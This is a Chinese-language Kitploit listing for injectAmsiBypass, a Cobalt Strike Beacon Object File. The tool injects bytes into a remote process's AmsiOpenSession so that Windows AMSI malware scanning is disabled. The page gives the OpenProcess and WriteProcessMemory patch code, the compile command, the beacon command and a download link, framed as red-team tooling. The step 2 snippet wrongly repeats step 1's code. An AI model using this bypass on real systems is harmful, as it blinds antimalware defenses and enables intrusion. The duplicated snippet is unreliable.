Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
injectAmsiBypass — Cobalt Strike BOF - 通过代码注入绕过远程进程中的AMSI。 | Kitploit
工具/GitHubGitHub/boku7/injectamsibypass
漏洞利用框架渗透测试红队Payload 开发
GitHubboku7/injectamsibypass

injectAmsiBypass

Cobalt Strike BOF - 通过代码注入绕过远程进程中的AMSI。

查看仓库
3806913年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cobalt Strike BOF - 注入AMSI绕过

Cobalt Strike Beacon对象文件(BOF),通过代码注入绕过远程进程中的AMSI。

从CobaltStrike运行inject-amsiBypass BOF

它的作用是什么?

1. 使用提供的PID参数获取远程进程的句柄
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. 将AMSI.DLL加载到Beacon的内存中,并获取AMSI.AmsiOpenSession的地址
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
  • Beacon和目标进程都将拥有相同的符号地址。
  • 如果远程进程中不存在AMSI.DLL,运行此操作可能导致目标进程崩溃。
3. 将AMSI绕过代码写入远程进程的内存
root@kitploit:~
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

方法 = AMSI.AmsiOpenSession

  • 使用Offensive Security的PEN-300/OSEP(规避技术与突破防御)课程中教授的AMSI绕过技术。
    • https://www.offensive-security.com/pen300-osep/

概念验证演示截图

之前 - Powershell.exe AMSI.AmsiOpenSession

之后 - Powershell.exe AMSI.AmsiOpenSession

使用x64 MinGW编译:

root@kitploit:~
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

从Cobalt Strike Beacon控制台运行

root@kitploit:~
beacon> inject-amsiBypass <PID>
  • 确保将inject-amsiBypass.cna脚本加载到Cobalt Strike的脚本管理器中

待办事项列表

  • 注入前检查远程进程中是否存在AMSI.DLL
  • 添加其他AMSI绕过方式以注入
  • 支持x86

致谢/参考

Raphael Mudge - Beacon对象文件 - Luser演示
  • https://www.youtube.com/watch?v=gfYswA_Ronw
Cobalt Strike - Beacon对象文件
  • https://www.cobaltstrike.com/help-beacon-object-files
BOF代码参考
ajpc500/BOFs
  • https://github.com/ajpc500/BOFs/
trustedsec/CS-Situational-Awareness-BOF
  • https://github.com/trustedsec/CS-Situational-Awareness-BOF
Sektor7恶意软件开发基础课程
  • https://institute.sektor7.net/red-team-operator-malware-development-essentials
Offensive Security OSEP
  • https://www.offensive-security.com/pen300-osep/
下载工具